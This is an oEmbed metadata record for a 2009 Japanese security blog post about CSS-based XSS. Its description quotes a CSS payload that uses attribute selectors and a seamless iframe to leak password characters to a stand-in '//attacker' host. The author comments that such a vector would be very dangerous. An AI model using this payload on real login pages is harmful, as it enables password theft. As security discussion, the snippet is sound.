{"provider_name":"Hatena Blog","published":"2009-08-04 00:00:00","blog_title":"hoshikuzu | star_dust \u306e\u66f8\u658e","provider_url":"https://hatena.blog","categories":[],"author_url":"https://blog.hatena.ne.jp/hoshikuzu/","blog_url":"https://hoshikuzu.hatenadiary.org/","title":"pure css-based XSS attacks ?","version":"1.0","height":"190","author_name":"hoshikuzu","description":"pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=\u201dlogin.asp\u201d/> HTML5 includes \"seamless\" iframes could allow for pure css-based XSS attacks \u3053\u306e\u3088\u3046\u306a\u30d9\u30af\u30bf\u304c\u3082\u3057\u3082\u8fd1\u3044\u5c06\u6765\u306b\u304a\u3044\u3066\u5b9f\u73fe\u3059\u308b\u306a\u3089\u3070\u6975\u3081\u3066\u5263\u5451\u3067\u3059\u3002\u307e\u3001XSS\u304c\u6210\u7acb\u3059\u308b\u306a\u3089form\u306e\u4e2d\u306einput\u8981\u7d20\u306e\u4e2d\u8eab\u304c\u6f0f\u6d29\u3059\u308b\u306e\u306f\u5f53\u7136\u2026","url":"https://hoshikuzu.hatenadiary.org/entry/20090804/p1","type":"rich","width":"100%","html":"<iframe src=\"https://hatenablog-parts.com/embed?url=https%3A%2F%2Fhoshikuzu.hatenadiary.org%2Fentry%2F20090804%2Fp1\" title=\"pure css-based XSS attacks ? - hoshikuzu | star_dust \u306e\u66f8\u658e\" class=\"embed-card embed-blogcard\" scrolling=\"no\" frameborder=\"0\" style=\"display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;\"></iframe>","image_url":null}